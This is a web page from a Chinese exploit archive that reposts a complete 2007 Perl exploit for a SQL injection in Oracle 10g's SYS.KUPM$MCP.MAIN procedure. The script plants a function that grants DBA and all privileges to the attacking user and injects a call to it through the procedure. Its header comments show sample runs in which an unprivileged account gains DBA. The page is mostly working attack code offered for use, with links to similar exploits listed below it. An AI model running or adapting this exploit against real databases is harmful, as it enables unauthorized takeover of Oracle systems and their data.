手机
当前位置:查字典教程网 >网络安全 >Exploit >Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit
Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit
摘要:#!/usr/bin/perl##RemoteOracleKUPM$MCP.MAINexploit(10g)##Grantorrevoked...

#!/usr/bin/perl

#

# Remote Oracle KUPM$MCP.MAIN exploit (10g)

#

# Grant or revoke dba permission to unprivileged user

#

# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"

#

# REF: http://www.red-database-security.com/

#

# AUTHOR: Andrea "bunker" Purificato

# http://rawlab.mindcreations.com

#

# DATE: Copyright 2007 - Tue Mar 27 10:47:14 CEST 2007

#

# Oracle InstantClient (basic sdk) required for DBD::Oracle

#

# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r

# [-] Wait...

# [-] Revoking DBA from BUNKER...

# DBD::Oracle::db do failed: ORA-01951: ROLE 'DBA' not granted to 'BUNKER' (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupm-mcpmain.pl line 97.

# [-] Done!

#

# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -g

# [-] Wait...

# [-] Creating evil function...

# [-] Go ...(don't worry about errors)!

# DBD::Oracle::st execute failed: ORA-06512: at "SYS.KUPM$MCP", line 874

# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "

# BEGIN

# SYS.KUPM$MCP.MAIN(''' AND 0=BUNKER.own--','');

# END;"] at kupm-mcpmain.pl line 119.

# [-] YOU GOT THE POWAH!!

#

# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r

# [-] Wait...

# [-] Revoking DBA from BUNKER...

# [-] Done!

#

use warnings;

use strict;

use DBI;

use Getopt::Std;

use vars qw/ %opt /;

sub usage {

print <<"USAGE";

Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]

Options:

-h <host> target server address

-s <sid> target sid name

-u <user> user

-p <passwd> password

-g|-r (g)rant dba to user | (r)evoke dba from user

[-P <port> Oracle port]

USAGE

exit 0

}

my $opt_string = 'h:s:u:p:grP:';

getopts($opt_string, %opt) or &usage;

&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );

&usage if ( !$opt{g} and !$opt{r} );

my $user = uc $opt{u};

my $dbh = undef;

if ($opt{P}) {

$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;

} else {

$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;

}

my $sqlcmd = "GRANT ALL PRIVILEGE, DBA TO $user";

print "[-] Wait...n";

if ($opt{r}) {

print "[-] Revoking DBA from $user...n";

$sqlcmd = "REVOKE DBA FROM $user";

$dbh->do( $sqlcmd );

print "[-] Done!n";

$dbh->disconnect;

exit;

}

print "[-] Creating evil function...n";

$dbh->do( qq{

CREATE OR REPLACE FUNCTION OWN RETURN NUMBER

AUTHID CURRENT_USER AS

PRAGMA AUTONOMOUS_TRANSACTION;

BEGIN

EXECUTE IMMEDIATE '$sqlcmd'; COMMIT;

RETURN(0);

END;

} );

print "[-] Go ...(don't worry about errors)!n";

my $sth = $dbh->prepare( qq{

BEGIN

SYS.KUPM$MCP.MAIN(''' AND 0=$user.own--','');

END;});

$sth->execute;

$sth->finish;

print "[-] YOU GOT THE POWAH!!n";

$dbh->disconnect;

exit;

【Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit】相关文章:

Maian Cart 1.1 Insecure Cookie Handling Vulnerability

MS Internet Explorer (FTP Server Response) DoS Exploit

Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

phsBlog 0.2 Bypass SQL Injection Filtering Exploit

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

Joomla Component n-forms 1.01 Blind SQL Injection Exploit

BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit

精品推荐
分类导航